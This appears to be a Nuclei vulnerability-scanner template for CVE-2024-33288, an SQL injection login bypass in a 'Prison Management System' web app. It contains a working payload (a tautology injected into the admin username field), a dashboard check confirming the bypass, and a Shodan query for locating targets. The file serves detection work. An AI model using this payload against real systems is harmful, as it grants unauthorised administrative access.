nuclei-templates/http/cves/2024/CVE-2024-33288.yaml

43 lines
1.1 KiB
YAML

id: CVE-2024-33288
info:
name: Prison Management System - SQL Injection Authentication Bypass
author: Kazgangap
severity: high
description: |
Sql injection vulnerability was found on the login page in Prison Management System
reference:
- https://en.0day.today/exploit/39610
- https://www.sourcecodester.com/sql/17287/prison-management-system.html
metadata:
verified: true
max-request: 2
shodan-query: title:"Prison Management System"
tags: cve,cve2024,cms,sqli
http:
- raw:
- |
POST /Admin/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
txtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin=
- |
GET /Admin/index.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "<p>Change Password</p>"
- "<p>Logout</p>"
- "Admin Dashboard | Prison Management system"
condition: and
- type: status
status:
- 200